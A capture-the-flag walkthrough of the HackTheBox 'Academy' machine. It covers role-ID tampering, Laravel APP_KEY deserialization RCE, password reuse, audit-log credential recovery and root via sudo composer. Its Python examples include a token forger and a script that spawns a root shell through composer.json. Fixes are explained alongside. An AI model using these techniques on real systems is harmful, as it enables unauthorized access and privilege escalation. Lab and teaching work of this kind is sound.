Academy
Synopsis: Academy is an easy-difficulty Linux machine that features an Apache server hosting a PHP website. The website turns out to be the HTB Academy learning platform. Capturing the user registration request in Burp reveals that we are able to modify the role ID, which lets us access an admin portal. That portal reveals a vhost, which is found to be running on Laravel. Laravel debug mode is enabled, and the exposed application key together with the vulnerable Laravel version allow us to carry out a deserialization attack that results in remote code execution. Examination of the Laravel .env file of another application reveals a password that works for the cry0l1t3 user, who is a member of the adm group. This allows us to read system logs, and the TTY input audit logs reveal the password for the mrb3n user. mrb3n has been granted permission to execute composer as root using sudo, which we can leverage to escalate our privileges.
As usual, start by scanning for open ports and running services with nmap.
Add academy.htb to /etc/hosts (this needs root, since the file is not writable by normal users): echo "10.10.10.215 academy.htb" >> /etc/hosts
Then open the website in the browser.
First, let's register an account.
A plain registration redirects us to the login page and, after logging in, to a home page where modules can be purchased. There is also a separate login page at /admin.php, but the account we just registered is rejected there: the application applies some role-based authorization mechanism on top of the password check.
Register again, entering a username and password, and intercept the request in Burp before it is submitted. Notice that there is an HTTP POST parameter called roleid, which is set to 0 by default.
Let's set it to another value to obtain a different role in the application.
Set it to 1 and forward the request.
With an account registered under the different role ID, go to the login page at /admin.php.
Log in with the manipulated account.
And boom, we are admin now.
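The flaw above is the server trusting a client-supplied role field. The following is an added example (not code from the page or from the Academy application) that reproduces the bug beside a hardened handler and adds the detection check a defender would want. The parameter name roleid and the values 0 and 1 are from the walkthrough; the other form field names (uid, password, confirm) and the request bodies are constructed assumptions.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs

# Assumption: roleid 0 is the default student role and 1 is admin, as observed on the box.
ROLE_STUDENT, ROLE_ADMIN = 0, 1

# Constructed request bodies as they would appear in Burp; only "roleid" is known from
# the walkthrough, the other field names are assumed.
NORMAL_BODY = "uid=student&password=Str0ngPass&confirm=Str0ngPass&roleid=0"
TAMPERED_BODY = "uid=sayonara&password=Str0ngPass&confirm=Str0ngPass&roleid=1"


@dataclass
class User:
    username: str
    password: str
    roleid: int


def parse_form(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to {field: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def register_vulnerable(body: str) -> User:
    """The flaw on the box: the role is taken from the client-controlled form field."""
    form = parse_form(body)
    return User(form["uid"], form["password"], int(form.get("roleid", ROLE_STUDENT)))


def register_fixed(body: str) -> User:
    """Hardened handler: the role is a server-side decision, so any roleid sent is
    ignored. Admin accounts would be created through a separate, admin-authenticated path."""
    form = parse_form(body)
    return User(form["uid"], form["password"], ROLE_STUDENT)


def admin_portal_allows(user: User) -> bool:
    """The check /admin.php performs after the password has been verified."""
    return user.roleid == ROLE_ADMIN


def role_tamper_attempt(body: str) -> bool:
    """Detection hook: a self-registration asking for any role other than the default
    is a tamper attempt worth logging, even after the handler has been fixed."""
    roleid = parse_form(body).get("roleid")
    return roleid is not None and roleid != str(ROLE_STUDENT)


if __name__ == "__main__":
    for handler in (register_vulnerable, register_fixed):
        user = handler(TAMPERED_BODY)
        print(f"{handler.__name__}: roleid={user.roleid} admin={admin_portal_allows(user)}")
```

The fix is not to validate the roleid value but to stop reading it from the request at all; a hidden form field is still attacker input.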
The admin page contains a table that lists a virtual host, dev-staging-01.academy.htb.
Let's add it to /etc/hosts as well (same IP, 10.10.10.215).
Visiting this virtual host in the browser shows an application built on the Laravel framework with debug mode enabled. The debug page leaks environment variables, including the application's encryption key (Laravel's APP_KEY; the exploit below calls it API_KEY). This is exactly why debug mode must never be enabled on a reachable host: the key that protects every encrypted cookie and token is shown to anyone who triggers an error.
Let's search for Laravel exploits.
Using searchsploit we find a couple of entries. Looking each one up on Exploit-DB, the token unserialize RCE exploit needs a valid application key to work, which we have, and also requires debug mode to be enabled.
To exploit this vulnerability in Laravel we can use a GitHub exploit.
You will find the installation guide in its repository. It takes the target URL and the key:
URL : http://dev-staging-01.academy.htb
API_KEY : dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
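To see why the leaked key is what makes the token unserialize exploit (CVE-2018-15133, the X-XSRF-TOKEN deserialization) possible, here is an added example, not taken from the page or from the exploit repository, that replays the part of Laravel's Illuminate\Encryption\Encrypter that every encrypted cookie and token must pass: base64(JSON{iv, value, mac}) with mac = HMAC-SHA256(key, base64(iv) + base64(value)). Anyone holding APP_KEY can produce a token the server accepts; anyone without it cannot even modify one byte. The key is the one shown above; the ciphertext is placeholder bytes (the real exploit puts an AES-256-CBC-encrypted PHP gadget chain there), and OTHER_KEY is a constructed stand-in for a different installation.

```python
import base64
import hashlib
import hmac
import json
import os

# The key leaked by the debug page (Laravel also accepts it with a "base64:" prefix).
APP_KEY = "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
# Constructed key standing in for "some other Laravel install".
OTHER_KEY = base64.b64encode(b"\x02" * 32).decode()


def raw_key(app_key: str) -> bytes:
    """Laravel base64-decodes the configured key, stripping an optional 'base64:' prefix."""
    prefix = "base64:"
    if app_key.startswith(prefix):
        app_key = app_key[len(prefix):]
    return base64.b64decode(app_key)


def laravel_mac(key: bytes, iv_b64: str, value_b64: str) -> str:
    """Encrypter::hash(): hash_hmac('sha256', $iv . $value, $key) over the base64 strings."""
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def forge_token(app_key: str, ciphertext: bytes, iv: bytes = None) -> str:
    """Build base64(JSON{iv, value, mac}), the shape Laravel's decrypt() expects.
    In the real exploit `ciphertext` is AES-256-CBC(key, iv, serialized gadget chain);
    here any bytes will do because only the key-dependent MAC check is demonstrated."""
    key = raw_key(app_key)
    iv = iv if iv is not None else os.urandom(16)
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    payload = {"iv": iv_b64, "value": value_b64,
               "mac": laravel_mac(key, iv_b64, value_b64)}
    return base64.b64encode(json.dumps(payload).encode()).decode()


def server_accepts(app_key: str, token: str) -> bool:
    """Replays Encrypter::getJsonPayload(): well-formed JSON, the three fields present,
    a 16-byte IV and a constant-time MAC comparison. Only after this does the server
    decrypt and unserialize the value, which is where the RCE happens."""
    try:
        payload = json.loads(base64.b64decode(token))
        if not isinstance(payload, dict) or not all(k in payload for k in ("iv", "value", "mac")):
            return False
        if len(base64.b64decode(payload["iv"])) != 16:
            return False
        expected = laravel_mac(raw_key(app_key), payload["iv"], payload["value"])
        return hmac.compare_digest(expected, payload["mac"])
    except (ValueError, TypeError):
        return False


def flip_ciphertext_byte(token: str) -> str:
    """Modify the encrypted value without knowing the key: the MAC no longer matches."""
    payload = json.loads(base64.b64decode(token))
    value = bytearray(base64.b64decode(payload["value"]))
    value[0] ^= 0x01
    payload["value"] = base64.b64encode(bytes(value)).decode()
    return base64.b64encode(json.dumps(payload).encode()).decode()


if __name__ == "__main__":
    token = forge_token(APP_KEY, b"\x00" * 32)
    print("forged with leaked key, accepted:", server_accepts(APP_KEY, token))
    print("same token, different key:      ", server_accepts(OTHER_KEY, token))
    print("value tampered without key:     ", server_accepts(APP_KEY, flip_ciphertext_byte(token)))
```

The MAC is doing its job; the problem is that the secret it depends on was printed on a debug page. Rotating APP_KEY after such a leak invalidates every outstanding encrypted cookie, which is the intended and necessary effect.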
Enumerating the box, we find another hidden environment file among the website's files, at /var/www/html/academy/.env.
It contains a password.
Let's use this password to log in as cry0l1t3 (after testing it against every user in /etc/passwd that has /bin/bash as a shell, we found that it is cry0l1t3's password).
Let's check which groups this user belongs to.
Let's find all files and directories owned by the group adm.
The adm group owns a lot of log files, which means every member of the group has the right to read the logs. Let's read them and see if anything interesting appears.
After reading the logs manually I couldn't find anything of interest, so I used a tool called aureport, which produces summary reports from the audit logs (those written by auditd under /var/log/audit/).
--tty: report about TTY keystrokes, which may include plaintext passwords. This is how the password for mrb3n shows up.
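aureport --tty works because the audit TTY records store the raw keystrokes hex-encoded in their data= field. The following is an added example (my own code, not the page's and not aureport) that decodes such records directly, renders them the way aureport does and, going one step further than the tool, replays DEL/backspace so each line reads as the user actually submitted it. The log excerpt is constructed: the timestamps, PIDs and the password typed into su are made up and are not taken from the box.

```python
import re
from typing import Iterator, List, NamedTuple, Tuple

# Constructed /var/log/audit/audit.log excerpt (not copied from the box). The data= field
# of a TTY record is the hex of the raw keystrokes: "su mrb3n", a made-up password typed
# into su, and "ls" corrected with two DEL presses to "id". The USER_AUTH line shows that
# other record types are skipped.
SAMPLE_AUDIT_LOG = """\
type=USER_AUTH msg=audit(1597199290.001:83): pid=2519 uid=1002 auid=0 ses=1 msg='op=PAM:authentication acct="cry0l1t3" exe="/usr/bin/su" res=success'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199300.112:85): tty pid=2521 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=46616B655F50617373776F7264313233210A
type=TTY msg=audit(1597199310.500:86): tty pid=2522 uid=1003 auid=0 ses=1 major=4 minor=1 comm="sh" data=6C737F7F69640A
"""

TTY_RECORD = re.compile(
    r'type=TTY .*?pid=(?P<pid>\d+) uid=(?P<uid>\d+) auid=(?P<auid>\d+) .*?'
    r'comm="(?P<comm>[^"]*)" data=(?P<data>[0-9A-Fa-f]+)'
)


class Keystrokes(NamedTuple):
    pid: int
    uid: int
    auid: int
    comm: str
    raw: bytes


def parse_tty_records(log_text: str) -> Iterator[Keystrokes]:
    """Yield one Keystrokes per type=TTY record; every other record type is ignored."""
    for line in log_text.splitlines():
        m = TTY_RECORD.search(line)
        if m:
            yield Keystrokes(int(m["pid"]), int(m["uid"]), int(m["auid"]),
                             m["comm"], bytes.fromhex(m["data"]))


def render(raw: bytes) -> str:
    """aureport --tty style rendering: printable bytes as-is, control bytes named."""
    names = {0x0A: "<nl>", 0x0D: "<nl>", 0x7F: "<del>", 0x08: "<backspace>",
             0x09: "<tab>", 0x1B: "<esc>"}
    out = []
    for b in raw:
        if b in names:
            out.append(names[b])
        elif 0x20 <= b < 0x7F:
            out.append(chr(b))
        elif b < 0x20:
            out.append("<^%s>" % chr(b + 0x40))
        else:
            out.append("<0x%02X>" % b)
    return "".join(out)


def apply_editing(raw: bytes) -> str:
    """Replay DEL/backspace so the text reads as it was finally submitted.
    Other control bytes (arrow keys, ^C, escape sequences) are dropped."""
    buf: List[str] = []
    for b in raw:
        if b in (0x7F, 0x08):
            if buf:
                buf.pop()
        elif b in (0x0A, 0x0D):
            buf.append("\n")
        elif 0x20 <= b < 0x7F:
            buf.append(chr(b))
    return "".join(buf)


def submitted_lines(log_text: str) -> List[Tuple[str, str]]:
    """(program, text as submitted) for every TTY record: the view an analyst wants."""
    return [(k.comm, apply_editing(k.raw).strip("\n")) for k in parse_tty_records(log_text)]


if __name__ == "__main__":
    for k in parse_tty_records(SAMPLE_AUDIT_LOG):
        print(f"pid={k.pid} uid={k.uid} auid={k.auid} comm={k.comm}: {render(k.raw)}")
```

The record with comm="su" is the interesting one: whatever was typed at su's password prompt is captured verbatim, which is why adm-readable audit logs with TTY auditing enabled are a credential source on this box.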
Now let's SSH in as the user mrb3n with that password.
Manual enumeration on the box (sudo -l) shows that mrb3n can run the composer command using sudo.
According to GTFOBins, the composer command can be abused to escalate privileges on the machine.
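The GTFOBins technique is simply a composer.json whose scripts section runs a shell, executed with sudo composer run-script so the script runs as root. The following is an added example (mine, not the page's or GTFOBins' code) that first confirms the sudo rule in the output of sudo -l, then writes the payload and builds the exact command line. The script string is the one from the GTFOBins sudo entry for composer; the sudo -l output is constructed, and the rule path /usr/bin/composer in it is an assumption.

```python
import json
import os
import re
import subprocess
import tempfile
from typing import Optional

# Script string from the GTFOBins "sudo" entry for composer: composer runs scripts through
# a shell, and these redirections keep the spawned shell interactive.
SHELL_SCRIPT = "/bin/sh -i 0<&3 1>&3 2>&3"
SCRIPT_NAME = "x"

# Constructed sudo -l output for mrb3n; the exact rule on the box is not quoted on the page.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
"""


def find_sudo_composer(sudo_l_output: str) -> Optional[str]:
    """Return the composer path from the permitted-commands section of sudo -l, if present."""
    in_rules = False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules:
            m = re.match(r"\s*\([^)]*\)\s*(?:\S+:\s*)?(\S*composer)\b", line)
            if m:
                return m.group(1)
    return None


def build_composer_json(command: str = SHELL_SCRIPT, name: str = SCRIPT_NAME) -> str:
    """composer.json with one custom script; run-script executes it as whoever runs composer."""
    return json.dumps({"scripts": {name: command}})


def write_workdir(command: str = SHELL_SCRIPT) -> str:
    """Create a throwaway --working-dir containing the malicious composer.json."""
    workdir = tempfile.mkdtemp(prefix="composer-")
    with open(os.path.join(workdir, "composer.json"), "w") as fh:
        fh.write(build_composer_json(command))
    return workdir


def sudo_command(workdir: str, name: str = SCRIPT_NAME) -> list:
    """The argv to run as mrb3n; sudo is what makes the script execute as root."""
    return ["sudo", "composer", f"--working-dir={workdir}", "run-script", name]


if __name__ == "__main__":
    if find_sudo_composer(SAMPLE_SUDO_L) is None:
        raise SystemExit("no composer sudo rule found")
    workdir = write_workdir()
    print("composer.json:", build_composer_json())
    print("running:", " ".join(sudo_command(workdir)))
    subprocess.call(sudo_command(workdir))  # drops into a root shell on the box
```

A sudo rule for composer (or any package manager that runs hooks) is equivalent to a rule for a shell; the fix is to remove the rule, not to restrict its arguments.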
I hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara